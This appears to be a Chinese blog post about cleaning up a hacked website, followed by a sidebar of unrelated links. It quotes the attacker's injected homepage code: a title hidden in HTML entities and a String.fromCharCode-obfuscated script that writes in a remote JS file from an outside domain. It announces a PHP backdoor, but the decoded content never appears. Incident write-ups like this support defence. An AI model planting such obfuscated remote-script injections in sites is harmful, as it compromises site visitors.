黑客攻击网站,篡改首页问题排查修复

sunphp开发者2024-12-27 8:28

1,修改首页,并植入js

标题通过unicode编码,隐藏了

<title>&#24320;&#20113;&#40;&#20013;&#22269;&#41;&#75;&#97;&#105;&#121;&#117;&#110;&#183;&#23448;

js文件通过String.fromCharCode隐藏起来了

<script type="text/javascript"> var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,120,106,115,56,56,50,46,99,111,109,47,121,98,46,106,115,34,62,60, 47,115, 99,114,105,112,116,62); document.write(xt);

2,加入php后门

解码后在实际攻击内容如下

相关推荐
木易 士心1 小时前
Android应用启动流程源码级解析
android
八宝粥大朋友2 小时前
Android sqlite3 编译及安装
android·java·sqlite
ego.iblacat2 小时前
MySQL 主从复制与读写分离
android·mysql·adb
Android系统攻城狮2 小时前
Android tinyalsa深度解析之pcm_params_get_period_size_max调用流程与实战(一百七十二)
android·pcm·tinyalsa·音频进阶
空空kkk2 小时前
MySQL 主从同步
android·数据库·mysql
weiggle2 小时前
Android View绘制流程深度解析
android
dora3 小时前
Android弱网优化 —— 都要卫星互联网了,谁给我限速体验2G
android·性能优化
用户3171478611333 小时前
仿今日头条 APP 开发实战:RecyclerView 核心玩法 + 全布局体系深度拆解
android
用户41659673693553 小时前
在 Jetpack Compose 中实现拼音与四线三格的精准对齐
android
用户69371750013843 小时前
太钻 Android 了,在电鸭刷私活把我自己刷清醒了
android·前端·github
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程07UV安装并设置国内源08“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)